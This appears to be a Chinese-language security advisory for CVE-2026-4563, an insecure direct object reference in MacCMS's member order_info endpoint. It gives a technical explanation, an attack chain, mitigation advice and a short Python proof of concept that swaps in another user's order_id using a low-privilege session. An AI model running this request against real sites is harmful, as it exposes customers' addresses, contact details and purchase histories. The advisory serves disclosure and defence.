CVE-2026-4563 CVSS 4.3 中危

CVE-2026-4563 MacCMS授权绕过漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4563

漏洞类型

授权绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MacCMS

漏洞概述

MacCMS v2025.1000.4052及之前版本存在授权绕过漏洞。该漏洞位于会员订单详情接口，具体涉及User.php文件中的order_info函数。由于对order_id参数缺乏严格的归属权校验，攻击者可远程利用此漏洞，在低权限状态下绕过身份验证，非法获取任意用户的订单敏感数据，造成信息泄露。

技术细节

该漏洞的技术根源在于MacCMS会员订单详情接口中存在不安全的直接对象引用（IDOR）及访问控制失效。问题代码具体位于application/index/controller/User.php文件的order_info函数。系统在设计上存在逻辑缺陷，仅依据客户端传入的order_id参数从数据库检索订单信息，而未在业务逻辑层严格验证当前登录用户是否具有该订单ID的所有权或访问权限。攻击者首先需要获取一个低权限账号，随后无需任何用户交互，即可构造恶意的HTTP请求，通过篡改order_id参数指向其他用户的订单。由于缺乏必要的权限校验机制，服务器会直接返回目标订单的敏感详情，导致严重的机密性泄露。此漏洞利用难度低，且可被远程利用，危害性较大。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统使用的是存在漏洞的MacCMS版本，并注册或获取一个低权限用户账号。

STEP 2

2. 漏洞利用

攻击者使用低权限账号登录，构造HTTP请求访问User控制器的order_info接口，并在请求参数中将order_id修改为受害者的订单ID。

STEP 3

3. 权限绕过

服务器端接收请求后，未验证当前用户与order_id的对应关系，直接从数据库查询并返回订单详情。

STEP 4

4. 数据泄露

攻击者成功获取到本无权查看的用户订单敏感信息，包括但不限于收货地址、联系方式和购买记录。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# POC for CVE-2026-4563
# This script demonstrates the authorization bypass
# by manipulating the order_id parameter.

target_url = "http://target.com/index.php/user/order_info"

# Attacker attempts to access order_id belonging to another user
payload = {
    "order_id": "TARGET_ORDER_ID"
}

# Low privilege user session (required by PR:L)
cookies = {
    "PHPSESSID": "valid_low_priv_session"
}

try:
    response = requests.get(target_url, params=payload, cookies=cookies, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check response content for leaked order details.")
        print(response.text[:200])
    else:
        print("[-] Request failed.")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

MacCMS <= 2025.1000.4052

防御指南

临时缓解措施

如果无法立即升级，建议通过WAF（Web应用防火墙）添加规则，拦截对/index/user/order_info路径的异常请求。同时，管理员应在代码层面进行临时修复，即在查询订单详情前强制校验session中的用户ID是否与订单所有者ID一致，防止越权访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4563
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4563
3 Details https://www.cvedetails.com/cve/CVE-2026-4563/
4 VulDB https://vuldb.com/cve/CVE-2026-4563
5 Link https://github.com/HuajiHD/CVE/issues/10
6 Link https://vuldb.com/?ctiid.352400
7 Link https://vuldb.com/?id.352400
8 Link https://vuldb.com/?submit.775050

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表